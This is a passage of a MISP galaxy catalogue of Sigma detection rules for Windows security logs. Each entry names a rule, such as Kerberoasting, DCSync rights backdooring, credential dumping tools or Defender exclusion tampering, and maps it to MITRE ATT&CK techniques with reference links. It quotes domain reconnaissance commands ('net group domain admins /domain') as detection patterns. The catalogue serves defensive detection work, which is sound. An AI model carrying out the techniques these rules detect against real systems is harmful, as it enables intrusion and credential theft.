https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml

Unauthorized System Time Modification

Detect scenarios where a potentially unauthorized application or user is modifying the system time.

The tag is: misp-galaxy:sigma-rules="Unauthorized System Time Modification"

Unauthorized System Time Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

Table 9013. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616

Live environment caused by malware[Live environment caused by malware]

Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)[Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml

NetNTLM Downgrade Attack

Detects NetNTLM downgrade attack

The tag is: misp-galaxy:sigma-rules="NetNTLM Downgrade Attack"

NetNTLM Downgrade Attack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9014. Table References

Links

https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml

VSSAudit Security Event Source Registration

Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.

The tag is: misp-galaxy:sigma-rules="VSSAudit Security Event Source Registration"

VSSAudit Security Event Source Registration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 9015. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_vssaudit_secevent_source_registration.yml

Password Change on Directory Service Restore Mode (DSRM) Account

The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.

The tag is: misp-galaxy:sigma-rules="Password Change on Directory Service Restore Mode (DSRM) Account"

Password Change on Directory Service Restore Mode (DSRM) Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 9016. Table References

Links

https://adsecurity.org/?p=1714

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_dsrm_password_change.yml

Service Registry Key Read Access Request

Detects "read access" requests on the services registry key. Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.

The tag is: misp-galaxy:sigma-rules="Service Registry Key Read Access Request"

Service Registry Key Read Access Request has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 9017. Table References

Links

https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/service_registry_permissions_weakness_check/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_registry_permissions_weakness_check.yml

Invoke-Obfuscation STDIN+ Launcher - Security

Detects Obfuscated use of stdin to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation STDIN+ Launcher - Security"

Invoke-Obfuscation STDIN+ Launcher - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9018. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml

Powerview Add-DomainObjectAcl DCSync AD Extend Right

Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer

The tag is: misp-galaxy:sigma-rules="Powerview Add-DomainObjectAcl DCSync AD Extend Right"

Powerview Add-DomainObjectAcl DCSync AD Extend Right has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 9019. Table References

Links

https://twitter.com/menasec1/status/1111556090137903104

https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml

Suspicious Outbound Kerberos Connection - Security

Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.

The tag is: misp-galaxy:sigma-rules="Suspicious Outbound Kerberos Connection - Security"

Suspicious Outbound Kerberos Connection - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

Table 9020. Table References

Links

https://github.com/GhostPack/Rubeus

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_outbound_kerberos_connection.yml

Suspicious Remote Logon with Explicit Credentials

Detects suspicious processes logging on with explicit credentials

The tag is: misp-galaxy:sigma-rules="Suspicious Remote Logon with Explicit Credentials"

Suspicious Remote Logon with Explicit Credentials has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 9021. Table References

Links

https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_explicit_credentials.yml

Important Windows Event Auditing Disabled

Detects scenarios where system auditing for important events such as "Process Creation" or "Logon" events is disabled.

The tag is: misp-galaxy:sigma-rules="Important Windows Event Auditing Disabled"

Important Windows Event Auditing Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 9022. Table References

Links

https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit

https://github.com/SigmaHQ/sigma/blob/master/documentation/logsource-guides/windows/service/security.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_disable_event_auditing_critical.yml

Invoke-Obfuscation CLIP+ Launcher - Security

Detects Obfuscated use of Clip.exe to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation CLIP+ Launcher - Security"

Invoke-Obfuscation CLIP+ Launcher - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9023. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml

Reconnaissance Activity

Detects activity as "net user administrator /domain" and "net group domain admins /domain"

The tag is: misp-galaxy:sigma-rules="Reconnaissance Activity"

Reconnaissance Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

Table 9024. Table References

Links

https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_net_recon_activity.yml

Invoke-Obfuscation Via Use Clip - Security

Detects Obfuscated Powershell via use Clip.exe in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use Clip - Security"

Invoke-Obfuscation Via Use Clip - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9025. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml

Windows Pcap Drivers

Detects Windows Pcap driver installation based on a list of associated .sys files.

The tag is: misp-galaxy:sigma-rules="Windows Pcap Drivers"

Windows Pcap Drivers has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

Table 9026. Table References

Links

https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_pcap_drivers.yml

Remote Task Creation via ATSVC Named Pipe

Detects remote task creation via at.exe or API interacting with ATSVC namedpipe

The tag is: misp-galaxy:sigma-rules="Remote Task Creation via ATSVC Named Pipe"

Remote Task Creation via ATSVC Named Pipe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="At - T1053.002" with estimative-language:likelihood-probability="almost-certain"

Table 9027. Table References

Links

https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_atsvc_task.yml

Replay Attack Detected

Detects possible Kerberos Replay Attack on the domain controllers when "KRB_AP_ERR_REPEAT" Kerberos response is sent to the client

The tag is: misp-galaxy:sigma-rules="Replay Attack Detected"

Replay Attack Detected has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal or Forge Kerberos Tickets - T1558" with estimative-language:likelihood-probability="almost-certain"

Table 9028. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649

https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_replay_attack_detected.yml

Sysmon Channel Reference Deletion

Potential threat actor tampering with Sysmon manifest and eventually disabling it

The tag is: misp-galaxy:sigma-rules="Sysmon Channel Reference Deletion"

Sysmon Channel Reference Deletion has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9029. Table References

Links

https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8

https://twitter.com/SecurityJosh/status/1283027365770276866

https://twitter.com/Flangvik/status/1283054508084473861

https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml

Credential Dumping Tools Service Execution - Security

Detects well-known credential dumping tools execution via service execution events

The tag is: misp-galaxy:sigma-rules="Credential Dumping Tools Service Execution - Security"

Credential Dumping Tools Service Execution - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9030. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_creddumper.yml

DPAPI Domain Master Key Backup Attempt

Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.

The tag is: misp-galaxy:sigma-rules="DPAPI Domain Master Key Backup Attempt"

DPAPI Domain Master Key Backup Attempt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

Table 9031. Table References

Links

https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml

SCM Database Handle Failure

Detects non-system users failing to get a handle of the SCM database.

The tag is: misp-galaxy:sigma-rules="SCM Database Handle Failure"

SCM Database Handle Failure has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"

Table 9032. Table References

Links

https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_handle_failure.yml

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security

Detects Obfuscated Powershell via VAR++ LAUNCHER

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security"

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9033. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml

New or Renamed User Account with '$' Character

Detects the creation of a user with the "$" character. This can be used by attackers to hide a user or trick detection systems that lack the parsing mechanisms.

The tag is: misp-galaxy:sigma-rules="New or Renamed User Account with '$' Character"

New or Renamed User Account with '$' Character has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 9034. Table References

Links

https://twitter.com/SBousseaden/status/1387743867663958021

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml

Windows Network Access Suspicious desktop.ini Action

Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder’s content (i.e. renaming files) without changing them on disk.

The tag is: misp-galaxy:sigma-rules="Windows Network Access Suspicious desktop.ini Action"

Windows Network Access Suspicious desktop.ini Action has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"

Table 9035. Table References

Links

https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml

Tap Driver Installation - Security

Detects the installation of a well-known TAP driver service. This could be a sign of potential preparation for data exfiltration using tunnelling techniques.

The tag is: misp-galaxy:sigma-rules="Tap Driver Installation - Security"

Tap Driver Installation - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"

Table 9036. Table References

Links

https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_tap_driver_installation.yml

PetitPotam Suspicious Kerberos TGT Request

Detect suspicious Kerberos TGT requests. Once an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes. One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus. This request will generate a 4768 event with some unusual fields depending on the environment. This analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.

The tag is: misp-galaxy:sigma-rules="PetitPotam Suspicious Kerberos TGT Request"

PetitPotam Suspicious Kerberos TGT Request has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Forced Authentication - T1187" with estimative-language:likelihood-probability="almost-certain"

Table 9037. Table References

Links

https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/

https://github.com/topotam/PetitPotam

https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml

Potential Privileged System Service Operation - SeLoadDriverPrivilege

Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode. This user right does not apply to Plug and Play device drivers. If you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers. This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.

The tag is: misp-galaxy:sigma-rules="Potential Privileged System Service Operation - SeLoadDriverPrivilege"

Potential Privileged System Service Operation - SeLoadDriverPrivilege has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9038. Table References

Links

https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml

Invoke-Obfuscation VAR+ Launcher - Security

Detects Obfuscated use of Environment Variables to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation VAR+ Launcher - Security"

Invoke-Obfuscation VAR+ Launcher - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9039. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_var_services_security.yml

Windows Defender Exclusion Reigstry Key - Write Access Requested

Detects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security.

The tag is: misp-galaxy:sigma-rules="Windows Defender Exclusion Reigstry Key - Write Access Requested"

Windows Defender Exclusion Reigstry Key - Write Access Requested has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9040. Table References

Links

https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_windows_defender_exclusions_write_access.yml

Meterpreter or Cobalt Strike Getsystem Service Installation - Security

Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation

The tag is: misp-galaxy:sigma-rules="Meterpreter or Cobalt Strike Getsystem Service Installation - Security"

Meterpreter or Cobalt Strike Getsystem Service Installation - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"

Table 9041. Table References

Links

https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/

https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml

Suspicious Kerberos RC4 Ticket Encryption

Detects service ticket requests using RC4 encryption type

The tag is: misp-galaxy:sigma-rules="Suspicious Kerberos RC4 Ticket Encryption"

Suspicious Kerberos RC4 Ticket Encryption has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

Table 9042. Table References

Links

https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity

https://adsecurity.org/?p=3458

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml

Windows Defender Exclusion List Modified

Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security.

The tag is: misp-galaxy:sigma-rules="Windows Defender Exclusion List Modified"

Windows Defender Exclusion List Modified has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9043. Table References

Links

https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_windows_defender_exclusions_registry_modified.yml

Suspicious Access to Sensitive File Extensions

Detects known sensitive file extensions accessed on a network share

The tag is: misp-galaxy:sigma-rules="Suspicious Access to Sensitive File Extensions"

Suspicious Access to Sensitive File Extensions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"

Table 9044. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_raccess_sensitive_fext.yml

External Disk Drive Or USB Storage Device Was Recognized By The System

Detects external disk drives or plugged-in USB devices.

The tag is: misp-galaxy:sigma-rules="External Disk Drive Or USB Storage Device Was Recognized By The System"

External Disk Drive Or USB Storage Device Was Recognized By The System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Hardware Additions - T1200" with estimative-language:likelihood-probability="almost-certain"

Table 9045. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6416

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_external_device.yml

Add or Remove Computer from DC

Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.

The tag is: misp-galaxy:sigma-rules="Add or Remove Computer from DC"

Add or Remove Computer from DC has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rogue Domain Controller - T1207" with estimative-language:likelihood-probability="almost-certain"

Table 9046. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741

https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_add_remove_computer.yml

SCM Database Privileged Operation

Detects non-system users performing privileged operation os the SCM database

The tag is: misp-galaxy:sigma-rules="SCM Database Privileged Operation"

SCM Database Privileged Operation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 9047. Table References

Links

https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_privileged_operation.yml

Suspicious Windows ANONYMOUS LOGON Local Account Created

Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.

The tag is: misp-galaxy:sigma-rules="Suspicious Windows ANONYMOUS LOGON Local Account Created"

Suspicious Windows ANONYMOUS LOGON Local Account Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"

Table 9048. Table References

Links

https://twitter.com/SBousseaden/status/1189469425482829824

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_local_anon_logon_created.yml

HackTool - NoFilter Execution

Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators

The tag is: misp-galaxy:sigma-rules="HackTool - NoFilter Execution"

HackTool - NoFilter Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"

Table 9049. Table References

Links

https://x.com/st0pp3r/status/1742203752361128162?s=20

https://www.deepinstinct.com/blog/nofilter-abusing-windows-filtering-platform-for-privilege-escalation

https://github.com/deepinstinct/NoFilter

https://github.com/deepinstinct/NoFilter/blob/121d215ab130c5e8e3ad45a7e7fcd56f4de97b4d/NoFilter/Consts.cpp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hktl_nofilter.yml

Protected Storage Service Access

Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers

The tag is: misp-galaxy:sigma-rules="Protected Storage Service Access"

Protected Storage Service Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 9050. Table References

Links

https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_protected_storage_service_access.yml

PowerShell Scripts Installed as Services - Security

Detects powershell script installed as a Service

The tag is: misp-galaxy:sigma-rules="PowerShell Scripts Installed as Services - Security"

PowerShell Scripts Installed as Services - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9051. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_powershell_script_installed_as_service.yml

Denied Access To Remote Desktop

This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop. Often, this event can be generated by attackers when searching for available windows servers in the network.

The tag is: misp-galaxy:sigma-rules="Denied Access To Remote Desktop"

Denied Access To Remote Desktop has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 9052. Table References

Links

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_not_allowed_rdp_access.yml

HybridConnectionManager Service Installation

Rule to detect the Hybrid Connection Manager service installation.

The tag is: misp-galaxy:sigma-rules="HybridConnectionManager Service Installation"

HybridConnectionManager Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554" with estimative-language:likelihood-probability="almost-certain"

Table 9053. Table References

Links

https://twitter.com/Cyb3rWard0g/status/1381642789369286662

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml

Invoke-Obfuscation RUNDLL LAUNCHER - Security

Detects Obfuscated Powershell via RUNDLL LAUNCHER

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation RUNDLL LAUNCHER - Security"

Invoke-Obfuscation RUNDLL LAUNCHER - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9054. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml

AD Privileged Users or Groups Reconnaissance

Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs

The tag is: misp-galaxy:sigma-rules="AD Privileged Users or Groups Reconnaissance"

AD Privileged Users or Groups Reconnaissance has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

Table 9055. Table References

Links

https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_discovery.yml

Active Directory Replication from Non Machine Account

Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.

The tag is: misp-galaxy:sigma-rules="Active Directory Replication from Non Machine Account"

Active Directory Replication from Non Machine Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"

Table 9056. Table References

Links

